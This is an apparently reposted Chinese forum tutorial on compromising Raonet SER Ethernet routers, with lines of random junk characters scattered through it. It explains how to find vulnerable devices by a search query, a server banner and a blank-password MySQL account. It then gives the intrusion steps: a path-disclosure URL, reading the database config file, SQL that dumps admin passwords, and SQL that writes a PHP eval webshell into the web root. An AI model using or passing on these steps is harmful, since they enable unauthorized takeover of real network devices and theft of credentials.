寻找存在漏洞的路由器方法:; C1 Z% Z% Q/ _: W" z
[, G1 c0 _& q/ Q3 T0 W, l, c( A( r1:google搜索'Raonet Subscriber Ethernet Router'
. B* S/ b% ?" t5 k* @) r* u0 |& S9 L6 ^' V
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
: Q$ }7 S/ e7 I) ^9 w4 Y6 g5 y8 ~( o- M* q$ Q+ q/ @
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。/ y% f, o! q/ F* u, o
: C3 i0 L- U; \/ X' N//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......' B! z$ Z( T, L, N) ]7 ]
/ F2 E: E% r, f7 h' _
( n2 v+ s3 l; \5 S# P- B+ I' b: G3 _0 z4 Z8 j
入侵步骤:6 P+ p# g5 j l3 m: t P% I- W
4 ~4 v' @( @' a/ w, @" V0 ^
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
6 T4 P7 {; I9 P* o, ~1 L% `6 Y) f
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
1 Z5 r% S) A5 e9 O0 U3:得到密码后连接,查看GUI管理密码:& i7 C; F* B4 J6 Q. l T; D
use ser_500! C& I. A* o0 r _4 j- q; F
select id,passwd from user;$ t$ C$ ?- @* ]5 ?; {' i6 _& ], [; x2 \8 ~
4:通过数据库写入webshell,执行命令:
- c3 A! \% V7 x6 U$ W1 R6 Z tuse mysql;
9 T1 A& Y/ A1 t; F7 G, rcreate table ok(cmd TEXT);: |0 a! L/ U! b t& E. u" f
insert into ok values("<?php @eval($_POST[cmd])?>");: `0 J" z u) f/ T$ j5 ^
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";8 O Z! N' E$ [/ k
drop table ok;
6 e; E1 V7 o7 _4 k8 }& P5 E
4 ^9 S ?# E' x% Y& Z4 B+ t5:连接后门shell.php
' F' P) _" |" v1 h6 D5 n$ b5 {6 h; c3 U8 F7 D+ r
6. 搞定!
: f5 V! h1 M+ {* i2 u- ?( W& J
9 o- F9 H9 h% A( y. x [ |